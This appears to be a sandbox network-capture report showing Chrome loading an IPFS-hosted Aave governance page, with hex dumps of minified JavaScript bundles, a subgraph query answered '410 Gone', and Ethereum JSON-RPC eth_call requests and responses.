                                                                                                                                                                                                                                                  Data Ascii: reduce(((e,n,o)=>(e.push(n),o<r.length-1&&e.push(i.cloneElement(t,{key:`separator-${o}`})),e)),[])}const v=(0,u.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,t)=>[t.root]})((({ownerState:e,theme:t})=>{let r=(0,o.Z)({display:"flex",flexDirect
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 76 65 72 73 69 6f 6e 3d 76 6f 69 64 20 30 2c 74 2e 76 65 72 73 69 6f 6e 3d 22 65 74 68 65 72 73 2f 35 2e 35 2e 34 22 7d 2c 35 31 35 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 63 72 65 61 74 65 42 69 6e 64 69 6e 67 7c 7c 28 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6e 29 7b 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 72 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 5b 72 5d
                                                                                                                                                                                                                                                  Data Ascii: ineProperty(t,"__esModule",{value:!0}),t.version=void 0,t.version="ethers/5.5.4"},5151:function(e,t,r){var n=this&&this.__createBinding||(Object.create?function(e,t,r,n){void 0===n&&(n=r),Object.defineProperty(e,n,{enumerable:!0,get:function(){return t[r]
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 72 65 74 75 72 6e 20 61 2e 46 69 78 65 64 4e 75 6d 62 65 72 7d 7d 29 3b 76 61 72 20 63 3d 72 28 34 38 30 38 38 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 53 69 67 6e 65 72 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 2e 53 69 67 6e 65 72 7d 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 56 6f 69 64 53 69 67 6e 65 72 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 2e 56 6f 69 64 53 69 67 6e 65 72 7d 7d 29 3b 76 61 72 20 6c 3d 72 28 37 39 39 31 31 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 57 61 6c 6c
                                                                                                                                                                                                                                                  Data Ascii: return a.FixedNumber}});var c=r(48088);Object.defineProperty(t,"Signer",{enumerable:!0,get:function(){return c.Signer}}),Object.defineProperty(t,"VoidSigner",{enumerable:!0,get:function(){return c.VoidSigner}});var l=r(79911);Object.defineProperty(t,"Wall
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 31 35 2e 33 35 37 20 32 48 31 35 22 7d 29 29 7d 29 29 3b 74 2e 5a 3d 6f 7d 2c 37 36 38 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 36 37 32 39 34 29 2c 6f 3d 72 28 34 36 34 29 2c 69 3d 72 28 33 30 30 38 31 29 2c 73 3d 72 28 39 31 37 38 34 29 2c 61 3d 72 28 38 35 39 34 35 29 2c 63 3d 72 28 33 37 31 32 32 29 2c 6c 3d 72 28 39 31 36 37 30 29 2c 75 3d 72 28 33 38 33 38 31 29 3b 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 29 7b 63 6f 6e 73 74 20 72 3d 28 30 2c 61 2e 4e 4c 29 28 7b 63 6f 6e 74 65 78 74 3a 65 2e 63 6f 6e 74 65 78 74 7d 29 2c 64 3d 28 30 2c 63 2e 53 29 28 29 2c 66 3d 28 30 2c 73 2e 5f 29 28 29 2c 70 3d 72 2e 64 65 66 61
                                                                                                                                                                                                                                                  Data Ascii: 15.357 2H15"}))}));t.Z=o},7687:function(e,t,r){r.d(t,{r:function(){return d}});var n=r(67294),o=r(464),i=r(30081),s=r(91784),a=r(85945),c=r(37122),l=r(91670),u=r(38381);function d(e,t){const r=(0,a.NL)({context:e.context}),d=(0,c.S)(),f=(0,s._)(),p=r.defa
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 28 36 37 32 39 34 29 2c 6f 3d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 2c 69 3d 28 65 2c 74 2c 72 29 3d 3e 28 28 28 65 2c 74 2c 72 29 3d 3e 7b 74 20 69 6e 20 65 3f 6f 28 65 2c 74 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 72 7d 29 3a 65 5b 74 5d 3d 72 7d 29 28 65 2c 22 73 79 6d 62 6f 6c 22 21 3d 74 79 70 65 6f 66 20 74 3f 74 2b 22 22 3a 74 2c 72 29 2c 72 29 3b 63 6f 6e 73 74 20 73 3d 28 65 2c 74 29 3d 3e 74 79 70 65 6f 66 20 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 3c 22 75 22 3f 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 74 29 3a 65 2e 73
                                                                                                                                                                                                                                                  Data Ascii: (67294),o=Object.defineProperty,i=(e,t,r)=>(((e,t,r)=>{t in e?o(e,t,{enumerable:!0,configurable:!0,writable:!0,value:r}):e[t]=r})(e,"symbol"!=typeof t?t+"":t,r),r);const s=(e,t)=>typeof getComputedStyle<"u"?getComputedStyle(e,null).getPropertyValue(t):e.s
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC614INData Raw: 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 29 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 3b 6c 65 74 20 74 3d 65 3b 66 6f 72 28 3b 74 26 26 74 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 26 26 74 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 29 7b 69 66 28 2f 28 73 63 72 6f 6c 6c 7c 61 75 74 6f 29 2f 2e 74 65 73 74 28 61 28 74 29 29 29 72 65 74 75 72 6e 20 74 3b 74 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 7d 29 28 6e 75 6c 6c 3d 3d 28 65 3d 74 68 69 73 2e 77 72 61 70 70 65 72 29 3f 76 6f 69 64 20 30 3a 65 2e 63 75 72 72 65 6e 74 29 7d 72 65 6e 64 65 72 28 29 7b 63 6f 6e 73 74 7b 63 68 69 6c 64 72 65 6e 3a 65 2c 63 6c 61 73 73 4e 61 6d 65 3a
                                                                                                                                                                                                                                                  Data Ascii: HTMLElement))return window;let t=e;for(;t&&t!==document.body&&t!==document.documentElement&&t.parentNode;){if(/(scroll|auto)/.test(a(t)))return t;t=t.parentNode}return window})(null==(e=this.wrapper)?void 0:e.current)}render(){const{children:e,className:


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  140192.168.2.549866104.18.40.314431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC750OUTPOST /subgraphs/name/aave/governance-v3 HTTP/1.1
                                                                                                                                                                                                                                                  Host: api.thegraph.com
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Content-Length: 1336
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  content-type: application/json
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1336OUTData Raw: 7b 22 71 75 65 72 79 22 3a 22 5c 6e 20 20 71 75 65 72 79 20 67 65 74 50 72 6f 70 6f 73 61 6c 73 28 24 66 69 72 73 74 3a 20 49 6e 74 21 2c 20 24 73 6b 69 70 3a 20 49 6e 74 21 2c 20 24 73 74 61 74 65 46 69 6c 74 65 72 3a 20 49 6e 74 29 20 7b 5c 6e 20 20 20 20 70 72 6f 70 6f 73 61 6c 73 28 6f 72 64 65 72 42 79 3a 20 70 72 6f 70 6f 73 61 6c 49 64 2c 20 6f 72 64 65 72 44 69 72 65 63 74 69 6f 6e 3a 20 64 65 73 63 2c 20 66 69 72 73 74 3a 20 24 66 69 72 73 74 2c 20 73 6b 69 70 3a 20 24 73 6b 69 70 29 20 7b 5c 6e 20 20 20 20 20 20 5c 6e 20 20 69 64 5c 6e 20 20 63 72 65 61 74 6f 72 5c 6e 20 20 61 63 63 65 73 73 4c 65 76 65 6c 5c 6e 20 20 69 70 66 73 48 61 73 68 5c 6e 20 20 70 72 6f 70 6f 73 61 6c 4d 65 74 61 64 61 74 61 20 7b 5c 6e 20 20 20 20 69 64 5c 6e 20 20 20
                                                                                                                                                                                                                                                  Data Ascii: {"query":"\n query getProposals($first: Int!, $skip: Int!, $stateFilter: Int) {\n proposals(orderBy: proposalId, orderDirection: desc, first: $first, skip: $skip) {\n \n id\n creator\n accessLevel\n ipfsHash\n proposalMetadata {\n id\n
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC451INHTTP/1.1 410 Gone
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:59 GMT
                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                  Content-Length: 345
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: __cf_bm=iFko.3hv.Ha7hcbkcG9blRU319S48dOQrC6_eF8ENa8-1727496719-1.0.1.1-jpVNMPHF.4b0f6zsq0URS0ArTFFzXeNU7nt2aCRDzpUxy0EASDdAfl2k5YhD.cyVXn1xaB4A9ESkoRqmbkTd2g; path=/; expires=Sat, 28-Sep-24 04:41:59 GMT; domain=.thegraph.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e481df9578d6-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC345INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 54 68 69 73 20 65 6e 64 70 6f 69 6e 74 20 68 61 73 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2e 20 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 69 73 20 73 75 62 67 72 61 70 68 20 79 6f 75 20 63 61 6e 20 75 70 67 72 61 64 65 20 69 74 20 62 79 20 67 6f 69 6e 67 20 68 65 72 65 3a 20 68 74 74 70 73 3a 2f 2f 74 68 65 67 72 61 70 68 2e 63 6f 6d 2f 68 6f 73 74 65 64 2d 73 65 72 76 69 63 65 2e 20 49 66 20 79 6f 75 20 68 61 76 65 20 61 6e 79 20 71 75 65 73 74 69 6f 6e 73 2c 20 72 65 61 63 68 20 6f 75 74 20 74 6f 20 73 75 70 70 6f 72 74 40 74 68 65 67 72 61 70 68 2e 7a 65 6e 64 65 73 6b 2e 63 6f 6d 2e 20 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 77 68 79 20 74 68 69 73 20 68 61 70 70 65 6e
                                                                                                                                                                                                                                                  Data Ascii: {"message":"This endpoint has been removed. If you are the owner of this subgraph you can upgrade it by going here: https://thegraph.com/hosted-service. If you have any questions, reach out to support@thegraph.zendesk.com. Learn more about why this happen


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  141192.168.2.54986734.36.6.2524431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC779OUTPOST /v1/62b3314e123e6f00397f19ca HTTP/1.1
                                                                                                                                                                                                                                                  Host: eth-mainnet.rpc.grove.city
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Content-Length: 137
                                                                                                                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  content-type: application/json
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC137OUTData Raw: 7b 22 6d 65 74 68 6f 64 22 3a 22 65 74 68 5f 63 61 6c 6c 22 2c 22 70 61 72 61 6d 73 22 3a 5b 7b 22 74 6f 22 3a 22 30 78 33 37 39 63 31 65 64 64 31 61 34 31 32 31 38 62 64 62 66 66 39 36 30 61 39 64 35 61 64 32 38 31 38 62 66 36 31 61 65 38 22 2c 22 64 61 74 61 22 3a 22 30 78 66 35 61 35 62 33 36 34 22 7d 2c 22 6c 61 74 65 73 74 22 5d 2c 22 69 64 22 3a 34 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 7d
                                                                                                                                                                                                                                                  Data Ascii: {"method":"eth_call","params":[{"to":"0x379c1edd1a41218bdbff960a9d5ad2818bf61ae8","data":"0xf5a5b364"},"latest"],"id":42,"jsonrpc":"2.0"}
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC420INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, solana-client
                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, PUT
                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:12:00 GMT
                                                                                                                                                                                                                                                  Content-Length: 615
                                                                                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC615INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 69 64 22 3a 34 32 2c 22 72 65 73 75 6c 74 22 3a 22 30 78 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 33 32 37 62 39 39 64 64 35 30 35 37 33 33 61 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 35 36 62 63 37 35 65 32 64 36 33 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 62 62 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                                                                                                                                                                                                                  Data Ascii: {"jsonrpc":"2.0","id":42,"result":"0x0000000000000000000000000000000000000000002327b99dd505733a8000000000000000000000000000000000000000000000000000056bc75e2d631000000000000000000000000000000000000000000000000000000000000000000bb800000000000000000000000000


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  142192.168.2.54986834.36.6.2524431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC779OUTPOST /v1/62b3314e123e6f00397f19ca HTTP/1.1
                                                                                                                                                                                                                                                  Host: eth-mainnet.rpc.grove.city
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Content-Length: 201
                                                                                                                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  content-type: application/json
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC201OUTData Raw: 7b 22 6d 65 74 68 6f 64 22 3a 22 65 74 68 5f 63 61 6c 6c 22 2c 22 70 61 72 61 6d 73 22 3a 5b 7b 22 74 6f 22 3a 22 30 78 39 31 63 30 65 61 33 31 62 34 39 62 36 39 65 61 31 38 36 30 37 37 30 32 63 35 64 39 61 63 33 36 30 62 66 33 64 65 37 64 22 2c 22 64 61 74 61 22 3a 22 30 78 65 63 34 38 39 63 32 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 66 33 39 64 32 31 38 31 33 33 61 66 61 62 38 66 32 62 38 31 39 62 31 30 36 36 63 37 65 34 33 34 61 64 39 34 65 39 65 22 7d 2c 22 6c 61 74 65 73 74 22 5d 2c 22 69 64 22 3a 34 33 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 7d
                                                                                                                                                                                                                                                  Data Ascii: {"method":"eth_call","params":[{"to":"0x91c0ea31b49b69ea18607702c5d9ac360bf3de7d","data":"0xec489c210000000000000000000000002f39d218133afab8f2b819b1066c7e434ad94e9e"},"latest"],"id":43,"jsonrpc":"2.0"}
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC419INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, solana-client
                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, PUT
                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:12:00 GMT
                                                                                                                                                                                                                                                  Content-Length: 80
                                                                                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC80INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 69 64 22 3a 34 33 2c 22 65 72 72 6f 72 22 3a 7b 22 63 6f 64 65 22 3a 2d 33 32 30 30 30 2c 22 6d 65 73 73 61 67 65 22 3a 22 65 78 65 63 75 74 69 6f 6e 20 72 65 76 65 72 74 65 64 22 7d 7d
                                                                                                                                                                                                                                                  Data Ascii: {"jsonrpc":"2.0","id":43,"error":{"code":-32000,"message":"execution reverted"}}


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  143192.168.2.54986934.36.6.2524431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC779OUTPOST /v1/62b3314e123e6f00397f19ca HTTP/1.1
                                                                                                                                                                                                                                                  Host: eth-mainnet.rpc.grove.city
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Content-Length: 201
                                                                                                                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  content-type: application/json
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC201OUTData Raw: 7b 22 6d 65 74 68 6f 64 22 3a 22 65 74 68 5f 63 61 6c 6c 22 2c 22 70 61 72 61 6d 73 22 3a 5b 7b 22 74 6f 22 3a 22 30 78 31 36 32 61 37 61 63 30 32 66 35 34 37 61 64 37 39 36 63 61 35 34 39 66 37 35 37 65 32 62 38 64 31 64 39 62 31 30 61 36 22 2c 22 64 61 74 61 22 3a 22 30 78 39 37 36 66 61 66 63 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 66 33 39 64 32 31 38 31 33 33 61 66 61 62 38 66 32 62 38 31 39 62 31 30 36 36 63 37 65 34 33 34 61 64 39 34 65 39 65 22 7d 2c 22 6c 61 74 65 73 74 22 5d 2c 22 69 64 22 3a 34 34 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 7d
                                                                                                                                                                                                                                                  Data Ascii: {"method":"eth_call","params":[{"to":"0x162a7ac02f547ad796ca549f757e2b8d1d9b10a6","data":"0x976fafc50000000000000000000000002f39d218133afab8f2b819b1066c7e434ad94e9e"},"latest"],"id":44,"jsonrpc":"2.0"}
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC427INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, solana-client
                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, PUT
                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:12:00 GMT
                                                                                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1390INData Raw: 32 39 61 63 0d 0a 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 69 64 22 3a 34 34 2c 22 72 65 73 75 6c 74 22 3a 22 30 78 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 33 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                                                                                                                                                                                                                  Data Ascii: 29ac{"jsonrpc":"2.0","id":44,"result":"0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000023000000000000000000000000000000000000000000000000000000000000046000000000000000000000
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1390INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 61 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 63 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 65 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 30 36 30 30 30
